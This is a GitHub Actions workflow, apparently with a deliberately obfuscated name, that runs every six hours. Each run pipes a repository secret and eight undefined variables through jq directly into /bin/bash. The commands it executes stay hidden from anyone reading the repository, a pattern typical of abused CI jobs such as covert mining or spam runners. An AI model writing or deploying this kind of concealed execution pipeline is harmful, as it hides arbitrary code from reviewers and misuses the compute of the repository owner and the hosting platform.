name: blastheineken
on:
  workflow_dispatch:
  schedule:
    - cron: '56 2/6 * * *'

jobs:  # 30623
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: blastheineken
        env:
          ir1: ${{ secrets.ir1 }}
        run: |
          echo $ir1 | jq -r .lvel21538 | /bin/bash
          echo $sq03004 | jq -r .erdoy8 | /bin/bash
          echo $sw81031 | jq -r .qo58 | /bin/bash
          echo $dzi2200 | jq -r .uki52 | /bin/bash
          echo $yf8494 | jq -r .bw5397 | /bin/bash
          echo $zcpn730 | jq -r .decmh8 | /bin/bash
          echo $nz70 | jq -r .wb66 | /bin/bash
          echo $ev02 | jq -r .g1938 | /bin/bash
          echo $bub0 | jq -r .o33050 | /bin/bash

